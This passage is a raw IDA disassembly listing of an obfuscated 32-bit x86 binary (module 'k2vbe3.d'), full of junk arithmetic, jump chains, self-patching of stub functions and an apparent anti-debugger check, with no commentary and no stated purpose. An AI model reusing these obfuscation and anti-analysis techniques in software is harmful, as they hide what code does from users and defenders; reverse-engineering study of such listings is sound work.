; FUNCTION CHUNK AT 0043F8AE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004421F4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442B48 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442CA2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443A1B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004448D3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00444DCA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00446C00 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044768D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045208B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452855 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004530A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453A00 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453B29 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004548D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045996F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045B41C SIZE 00000005 BYTES

		mov	eax, [ebp-0Ch]
		neg	eax
		sbb	eax, eax
		neg	eax
		mov	[ebp-5], al
		jmp	loc_45B41C
sub_44D59D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44D5AE:				; CODE XREF: sub_43CCD0:loc_4556DDj
		lea	eax, [ebp-0Ch]
		jmp	loc_4482D7
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4568DA

loc_44D5B6:				; CODE XREF: sub_4568DA:loc_4468A6j
		push	17E4A767h
		pop	ecx
		and	ecx, 0D15A72BAh
		add	ecx, 0C40B6515h
		add	ecx, edx
		add	ecx, 2AB478E1h
		mov	ecx, [ecx]
		popf
		jmp	loc_44ED7A
; END OF FUNCTION CHUNK	FOR sub_4568DA
; ---------------------------------------------------------------------------
		xor	edi, 812A1583h
		jmp	loc_4468FD
; ---------------------------------------------------------------------------
		db 0Fh
		dd 0FEEA308Ah, 0B18E9FFh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_44D5EE:				; CODE XREF: sub_446CCF:loc_43D154j
		mov	eax, [ebp-20h]
		mov	byte ptr [eax],	0
		inc	dword ptr [ebp-1Ch]
		jmp	loc_44F547
; ---------------------------------------------------------------------------

loc_44D5FC:				; CODE XREF: sub_446CCF:loc_43C2C8j
		inc	dword ptr [ebp-1Ch]
		jmp	loc_44AD82
; END OF FUNCTION CHUNK	FOR sub_446CCF
; ---------------------------------------------------------------------------

loc_44D604:				; CODE XREF: k2vbe3.d:00441167j
					; k2vbe3.d:00450C8Cj
		inc	dword ptr [ebp-18h]
		jmp	loc_4505D6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_200. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44D60D:				; CODE XREF: sub_456666-131A5j
		jmp	loc_457852
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
		jnb	loc_44D04A
		jmp	sub_44E6B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_44D61D:				; CODE XREF: sub_453347:loc_45B46Cj
		push	offset loc_449F94
		jmp	nullsub_423
; END OF FUNCTION CHUNK	FOR sub_453347
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457960

loc_44D627:				; CODE XREF: sub_457960+307Fj
		pop	eax

loc_44D628:				; CODE XREF: k2vbe3.d:loc_44962Aj
		mov	eax, [ebp-0Ch]
		mov	esp, ebp
		call	sub_456D05

loc_44D632:				; CODE XREF: sub_44067C+1B2A9j
		jmp	sub_44E481
; END OF FUNCTION CHUNK	FOR sub_457960
; ---------------------------------------------------------------------------
		mov	ds:dword_41E0BC, eax
		lea	eax, nullsub_328
		mov	byte ptr [eax],	0C3h
		jmp	loc_447F4E
; ---------------------------------------------------------------------------
		call	nullsub_479
		jmp	ds:dword_41E0C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_479. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	byte ptr ds:5AFFFF34h, 8Bh
		add	al, 24h
		jmp	loc_445556
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_370. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EDD

loc_44D666:				; CODE XREF: sub_454EDD-16C3Aj
		jmp	loc_458425
; END OF FUNCTION CHUNK	FOR sub_454EDD
; ---------------------------------------------------------------------------
		mov	[edx], ecx
		cmp	edi, esi
		jmp	loc_45A9AD
; ---------------------------------------------------------------------------

loc_44D674:				; CODE XREF: k2vbe3.d:00448002j
		jnz	loc_4417EA
		jmp	loc_43DFC7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_407. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2DF

loc_44D680:				; CODE XREF: sub_44A2DF+874Dj
		jmp	loc_4467CC
; END OF FUNCTION CHUNK	FOR sub_44A2DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44D685:				; CODE XREF: sub_44C90E-6A7j
		jmp	loc_45982A
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E00F

loc_44D68A:				; CODE XREF: sub_44E00F-993Ej
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_44E00F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_44D68F:				; CODE XREF: sub_44B979:loc_43DFD1j
		call	sub_44662B
		test	al, al
		jz	loc_44C423
		jmp	loc_452BAE
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF62

loc_44D6A1:				; CODE XREF: sub_43CF62+12j
		xchg	ebx, [esp-4+arg_0]
		mov	ecx, ebx
		not	ebx
		jmp	loc_43F81B
; END OF FUNCTION CHUNK	FOR sub_43CF62
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDF

loc_44D6AD:				; CODE XREF: sub_442DDF:loc_4411C0j
		push	offset loc_45AF7B
		jmp	nullsub_84
; END OF FUNCTION CHUNK	FOR sub_442DDF

; =============== S U B	R O U T	I N E =======================================



sub_44D6B7	proc near		; CODE XREF: sub_44921C-185Dj
					; k2vbe3.d:0044E3FDp

; FUNCTION CHUNK AT 00444897 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004514AD SIZE 0000000A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	ds:off_41E0D4, eax
		lea	eax, sub_44ED3C
		jmp	loc_444897
sub_44D6B7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_44D6CC:				; CODE XREF: sub_454AD4:loc_44211Bj
		mov	al, [eax]
		jo	loc_45C315
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44503A
		jmp	loc_44DC02
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_44D6E8:				; CODE XREF: sub_4460FD:loc_459649j
		jnz	loc_455FD0

loc_44D6EE:				; CODE XREF: k2vbe3.d:00443FECj
		jmp	loc_448BB6
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
		not	edi
		or	eax, 9416D8EAh
		jmp	loc_455FCE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_298. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45814D

loc_44D701:				; CODE XREF: sub_45814D+5j
		jmp	nullsub_268
; END OF FUNCTION CHUNK	FOR sub_45814D
; ---------------------------------------------------------------------------

loc_44D706:				; CODE XREF: k2vbe3.d:0044116Dj
		jmp	loc_457D8A
; ---------------------------------------------------------------------------

loc_44D70B:				; CODE XREF: k2vbe3.d:0045256Ej
		not	esi
		and	edx, 0E2819F09h
		sbb	ebx, edi
		jmp	loc_44605F
; ---------------------------------------------------------------------------
		test	ecx, 1121BE42h
		jmp	loc_448C14
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C297

loc_44D725:				; CODE XREF: sub_44C297+13j
		push	edi
		push	0EC77B790h
		pop	edi
		sub	edi, 0EF1FCBEBh
		jmp	loc_4562E6
; END OF FUNCTION CHUNK	FOR sub_44C297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_44D737:				; CODE XREF: sub_4506C3-12431j
		push	0F7641474h

loc_44D73C:				; CODE XREF: k2vbe3.d:loc_447CE2j
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+8+var_8]
		push	0E60783A3h
		pop	ecx
		sub	ecx, 1E36B0FCh
		add	ecx, 3874C8B4h
		jmp	loc_448F2B
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------

loc_44D759:				; CODE XREF: k2vbe3.d:loc_448E3Cj
		rol	ecx, 0Bh
		jnb	loc_456AED
		xor	ecx, edx
		mov	eax, esi
		jle	loc_4489D7
		jmp	loc_456AE6
; ---------------------------------------------------------------------------

loc_44D771:				; DATA XREF: k2vbe3.d:0044D458o
		push	86E00EEFh
		pop	eax
		rol	eax, 1
		or	eax, 0F73FF4FFh
		xor	eax, 0D850A4E0h
		jnz	loc_44BF2B
		pop	ecx
		sub	eax, 0AE8F7BA4h
		jmp	loc_44E233
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_44D797:				; CODE XREF: sub_448D7F:loc_44E9ECj
		mov	esi, edx
		xchg	esi, [esp+0]
		push	4924C486h
		pop	edx
		jmp	loc_43F01D
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
		mov	eax, 5BE2C7B9h
		push	ecx
		push	0E1D2DDCFh
		pop	ecx
		rol	ecx, 1Eh
		jb	loc_45C06A
; START	OF FUNCTION CHUNK FOR sub_4586FE

loc_44D7BC:				; CODE XREF: sub_4586FE+22j
		jmp	loc_449F07
; END OF FUNCTION CHUNK	FOR sub_4586FE
; ---------------------------------------------------------------------------
		cmp	edx, 62696AC5h
		jmp	loc_44EA2B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_395. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443C0D

loc_44D7CD:				; CODE XREF: sub_443C0D+80A7j
		jmp	loc_455427
; END OF FUNCTION CHUNK	FOR sub_443C0D
; ---------------------------------------------------------------------------

loc_44D7D2:				; CODE XREF: k2vbe3.d:0043F387j
		jmp	sub_453347
; ---------------------------------------------------------------------------

loc_44D7D7:				; CODE XREF: k2vbe3.d:00455487j
		jp	loc_44E92D

loc_44D7DD:				; CODE XREF: k2vbe3.d:loc_451AE3j
		call	nullsub_197
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44032C

loc_44D7E3:				; CODE XREF: sub_44032C+16B60j
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_44032C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A5FF

loc_44D7E8:				; CODE XREF: sub_45A5FF-A7D5j
		jmp	loc_440169
; END OF FUNCTION CHUNK	FOR sub_45A5FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_44D7ED:				; CODE XREF: sub_45BE94-CC03j
		jmp	loc_44CDDF
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_44D7F2:				; CODE XREF: sub_43D823-F74j
		jmp	loc_447C3C
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_44D7F7:				; CODE XREF: sub_454E83-18B5Bj
		jmp	loc_458241
; END OF FUNCTION CHUNK	FOR sub_454E83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_197. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_44D7FD:				; CODE XREF: sub_452092+5DE2j
		jmp	loc_44CC76
; END OF FUNCTION CHUNK	FOR sub_452092
; ---------------------------------------------------------------------------

locret_44D802:				; CODE XREF: k2vbe3.d:004425B1j
					; k2vbe3.d:00455338j
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS	KEYPAD "+" TO EXPAND]
		dd 4702h
; ---------------------------------------------------------------------------

loc_44D808:				; CODE XREF: k2vbe3.d:loc_441EA6j
		jmp	ds:dword_41E19C
; ---------------------------------------------------------------------------

loc_44D80E:				; CODE XREF: k2vbe3.d:00456A36j
		jmp	loc_448B6A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440543

loc_44D813:				; CODE XREF: sub_440543+5j
		jmp	loc_43E12E
; END OF FUNCTION CHUNK	FOR sub_440543
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		adc	byte ptr [ecx+56h], 0FFh
		inc	dword ptr [edi-2A74DBD4h]
		pop	ebp
		call	sub_43E8D4

loc_44D829:				; CODE XREF: k2vbe3.d:00450C66j
		jmp	loc_45A511
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44D82E:				; CODE XREF: sub_44C90E-6633j
		jmp	loc_449AFF
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		add	edi, eax
		jmp	loc_446D3B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E4CE

loc_44D83A:				; CODE XREF: sub_43E4CE:loc_459E05j
		rol	edx, 1
; END OF FUNCTION CHUNK	FOR sub_43E4CE
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44D83C:				; CODE XREF: sub_45A323:loc_450B09j
		jnb	loc_458E63

loc_44D842:				; CODE XREF: k2vbe3.d:0044CEC4j
		jmp	nullsub_429
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		mov	ecx, 4DEFCC9Ch
		add	ebp, 541D8656h
		ja	loc_4441AC
		cmp	ebp, 44983302h
		jmp	loc_45157F

; =============== S U B	R O U T	I N E =======================================



sub_44D863	proc near		; CODE XREF: k2vbe3.d:0044A55Dj
					; sub_440F56+BB03p

; FUNCTION CHUNK AT 00440AC0 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00446253 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045578A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455AA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B631 SIZE 00000019 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_43CC89
		push	0FBC63ED0h
		pop	eax
		xor	eax, 2496F279h
		jmp	loc_455AA4
sub_44D863	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ebx, 928B2DB6h
		jmp	sub_442F31

; =============== S U B	R O U T	I N E =======================================



sub_44D887	proc near		; CODE XREF: sub_43FAE2:loc_43C007p
					; k2vbe3.d:0044541Fj

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00445E73 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C85D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004533D6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045B9BE SIZE 0000001D BYTES

		xchg	eax, [esp+8+var_8]
		pop	eax
		mov	eax, [ebp-1Ch]
		mov	al, [eax]
		call	sub_446CCF

loc_44D895:				; CODE XREF: sub_44CD6E+5j
		jmp	loc_445E73
sub_44D887	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_44D89A:				; CODE XREF: sub_43C3A9+2519j
		js	loc_449958

loc_44D8A0:				; CODE XREF: k2vbe3.d:00457E7Fj
		jmp	loc_45A8CD
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_44D8A5:				; CODE XREF: sub_43C82E+AEA5j
		jmp	nullsub_90
; END OF FUNCTION CHUNK	FOR sub_43C82E
; ---------------------------------------------------------------------------
		xchg	edx, [eax]
		test	ebx, 1B1CD98Ah
		jmp	loc_44C901
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_410. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB3F

loc_44D8B8:				; CODE XREF: sub_44EB3F+8j
		jmp	loc_44DBBF
; END OF FUNCTION CHUNK	FOR sub_44EB3F
; ---------------------------------------------------------------------------
		rol	ecx, 1Ah
		pop	ecx
		mov	ebx, ecx
		jmp	loc_45A5AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C5F

loc_44D8C8:				; CODE XREF: sub_456C5F:loc_440DCDj
		jz	loc_44346B

loc_44D8CE:				; CODE XREF: k2vbe3.d:0044DD70j
		jmp	nullsub_227
; END OF FUNCTION CHUNK	FOR sub_456C5F
; ---------------------------------------------------------------------------
		adc	eax, esi
		ror	ecx, 18h
		jmp	loc_443466
; ---------------------------------------------------------------------------

loc_44D8DD:				; CODE XREF: k2vbe3.d:loc_446461j
		rol	eax, 9

; =============== S U B	R O U T	I N E =======================================



sub_44D8E0	proc near		; CODE XREF: sub_452CF7+933Ap
		xchg	eax, [esp+0]
		pop	eax
		add	eax, 4AFB4E4Ch
		push	eax
		call	sub_43D85C

locret_44D8F0:				; CODE XREF: sub_449995+1Bj
		retn
sub_44D8E0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A40

loc_44D8F1:				; CODE XREF: sub_450A40+8CBEj
		jmp	loc_45977E
; END OF FUNCTION CHUNK	FOR sub_450A40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_44D8F6:				; CODE XREF: sub_4460FD+6D6Aj
		jmp	loc_4532F8
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_44D8FB:				; CODE XREF: sub_455BEA+1j
		mov	esi, ebp
		xchg	esi, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	esi, [esp+8+var_8]
		mov	ebp, esi
		jmp	loc_459EA5
; END OF FUNCTION CHUNK	FOR sub_455BEA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_239. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44D910	proc near		; CODE XREF: k2vbe3.d:00448245j
					; sub_453DB9+5E96p

; FUNCTION CHUNK AT 00443BBC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B67F SIZE 00000004 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [ebp-4]
		call	nullsub_10
		jmp	loc_443BBC
sub_44D910	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_44D921:				; CODE XREF: sub_44B999-4421j
		jbe	loc_44C361
		jmp	loc_451E23
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_44D92C:				; CODE XREF: sub_44A1B1:loc_4552AEj
		movzx	eax, byte ptr [eax]
		mov	edx, [ebp+8]
		mov	[edx-18h], eax
		jmp	loc_444456
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_44D93A:				; CODE XREF: sub_456541:loc_443902j
		cmp	dword ptr [ebp-14h], 4
		jmp	loc_44443D
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_44D943:				; CODE XREF: sub_43C3A9:loc_45954Dj
		jnz	loc_454FB8
		jmp	loc_45A54E
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
		mov	eax, 0D1CB0F56h
		call	sub_4553CC
		mov	ds:dword_41E134, eax
		lea	eax, nullsub_526
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_526
; ---------------------------------------------------------------------------
		call	sub_44CD6E
; START	OF FUNCTION CHUNK FOR sub_4437D3

loc_44D971:				; CODE XREF: sub_4437D3+129D5j
		jmp	loc_43E03C
; END OF FUNCTION CHUNK	FOR sub_4437D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_44D976:				; CODE XREF: sub_455C7A-126FCj
		jmp	loc_44AEE0
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------

loc_44D97B:				; CODE XREF: k2vbe3.d:00448D14j
		js	loc_4490B3

loc_44D981:				; CODE XREF: k2vbe3.d:loc_448A3Cj
		push	eax
		lea	eax, loc_442184
		push	eax
		push	edx
		jmp	loc_451859
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEFE

loc_44D98F:				; CODE XREF: sub_44EEFE-C76Dj
		xchg	edi, [esp+4+var_4]
		call	sub_44F49C
		mov	eax, 851AF986h
		push	eax
		push	85828020h
		jmp	loc_44B407
; END OF FUNCTION CHUNK	FOR sub_44EEFE

; =============== S U B	R O U T	I N E =======================================



sub_44D9A7	proc near		; CODE XREF: sub_4440E5+79Ap
					; k2vbe3.d:004556F9j

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043F3D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F4D9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044100A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004423B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443210 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448944 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00449584 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004498D7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044AD38 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044B60C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044F011 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045306C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00454C4B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00455526 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045641C SIZE 00000018 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edx
		push	4C75DB3Ch
		xor	edx, ecx
		jmp	loc_443210
sub_44D9A7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44D9B8:				; CODE XREF: sub_44B94B+E78Dj
		not	ebx

loc_44D9BA:				; CODE XREF: sub_44B94B:loc_457CA4j
		lea	eax, [ebp-2AAh]
		cmp	dword ptr [eax], 47424454h
		jz	loc_44DE55
		jmp	loc_459418
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_44D9D1:				; CODE XREF: k2vbe3.d:0043EBFBj
		jnb	nullsub_290
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_44D9D7:				; CODE XREF: sub_45B4EE:loc_43D73Fj
		sub	esi, 47323A3Eh
		and	esi, 58DA93EEh
		add	esi, 46A55BC4h
		call	sub_451DD8

loc_44D9EE:				; CODE XREF: k2vbe3.d:0045193Aj
		jmp	loc_442D0A
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_44D9F3:				; CODE XREF: sub_45101A+8j
		jmp	loc_447235
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_44D9F8:				; CODE XREF: sub_44067C+E7BEj
		jmp	loc_443DF6
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_44D9FD:				; CODE XREF: sub_43C82E+11D0Fj
		jmp	loc_43C759
; END OF FUNCTION CHUNK	FOR sub_43C82E
; ---------------------------------------------------------------------------
		jmp	ds:off_41E0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E2A4

loc_44DA08:				; CODE XREF: k2vbe3.d:loc_44B049j
					; sub_44E2A4:loc_44E2B2j ...
		jns	loc_44E2B7
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	esi
		mov	esi, edx
		xchg	esi, [esp+0]
		jmp	loc_443291
; END OF FUNCTION CHUNK	FOR sub_44E2A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F364

loc_44DA1D:				; CODE XREF: sub_43F364+15j
		mov	esi, [ebx]
		sub	ebp, 0D48E910Ch

loc_44DA25:				; CODE XREF: k2vbe3.d:loc_43F32Dj
		jmp	loc_44F0AB
; END OF FUNCTION CHUNK	FOR sub_43F364
; ---------------------------------------------------------------------------
		db 90h
		db 7Fh
dword_44DA2C	dd 0F3BA8D3Bh		; DATA XREF: k2vbe3.d:00449AF2r
; ---------------------------------------------------------------------------

loc_44DA30:				; CODE XREF: k2vbe3.d:0043F95Cj
		jmp	loc_4563BC
; ---------------------------------------------------------------------------
		db 5Eh,	0Bh, 0A0h
dword_44DA38	dd 0BF2A1BBFh		; DATA XREF: sub_44F42B-3EBBw
					; sub_45A21D-2904r
; ---------------------------------------------------------------------------

loc_44DA3C:				; CODE XREF: k2vbe3.d:0043F945j
		jmp	sub_445047
; ---------------------------------------------------------------------------
		db 0CEh, 42h, 0CBh
dword_44DA44	dd 0E738DDF9h		; DATA XREF: sub_449372-1385r
; ---------------------------------------------------------------------------

loc_44DA48:				; CODE XREF: k2vbe3.d:004512F2j
		jmp	loc_442DAD
; ---------------------------------------------------------------------------

loc_44DA4D:				; CODE XREF: k2vbe3.d:0043E4B8j
		jmp	loc_44447C
; ---------------------------------------------------------------------------
		dw 83A0h
dword_44DA54	dd 0FCF3920Eh		; DATA XREF: sub_44529A+114Ar
					; sub_45A323+136w
dword_44DA58	dd 0A77D4BDCh		; DATA XREF: sub_43FDC1r sub_4455D8+Aw ...
dword_44DA5C	dd 0AE1663BEh		; DATA XREF: sub_444B65+4w
					; sub_454FA8+3r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A99

loc_44DA60:				; CODE XREF: sub_450A99+9j
		jmp	loc_43ED62
; END OF FUNCTION CHUNK	FOR sub_450A99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AE3

loc_44DA65:				; CODE XREF: sub_441AE3+216Dj
		jmp	loc_442AFF
; END OF FUNCTION CHUNK	FOR sub_441AE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_44DA6A:				; CODE XREF: sub_44D2F1-3840j
		jl	loc_459F66
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; START	OF FUNCTION CHUNK FOR sub_45024C

loc_44DA70:				; CODE XREF: sub_45024C+13j
		jmp	loc_452F4C
; END OF FUNCTION CHUNK	FOR sub_45024C
; ---------------------------------------------------------------------------
		or	edi, ebx
		mov	edi, esi
		mov	[ecx], edx
		jmp	loc_459F65
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_44DA80:				; CODE XREF: sub_454E69-132FAj
		jnz	loc_43E0A4
		jge	loc_4559E9
		jbe	loc_44BB5A
		shr	edx, 18h
		jno	sub_4440DA
		jmp	loc_43E0A4
; END OF FUNCTION CHUNK	FOR sub_454E69

; =============== S U B	R O U T	I N E =======================================



sub_44DAA0	proc near		; DATA XREF: sub_44746F+14F12o

; FUNCTION CHUNK AT 00447688 SIZE 00000005 BYTES

		mov	dword ptr [ebp-14h], 4
		mov	eax, [ebp-14h]
		push	offset loc_45B3EE
		jmp	loc_447688
sub_44DAA0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_44DAB4:				; CODE XREF: sub_4580DF-19C49j
		jnz	loc_4451F7
; END OF FUNCTION CHUNK	FOR sub_4580DF
; START	OF FUNCTION CHUNK FOR sub_440D6A

loc_44DABA:				; CODE XREF: sub_440D6A+10A3Cj
		jmp	loc_457EE6
; END OF FUNCTION CHUNK	FOR sub_440D6A
; ---------------------------------------------------------------------------
		mov	esi, [ebp+0]
		shr	ebp, 17h
		cdq
		xor	esi, edi
		jmp	loc_4451F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_44DACD:				; CODE XREF: sub_447C43+4282j
		cmp	ecx, ebx
		jmp	loc_44B82A
; END OF FUNCTION CHUNK	FOR sub_447C43
; ---------------------------------------------------------------------------
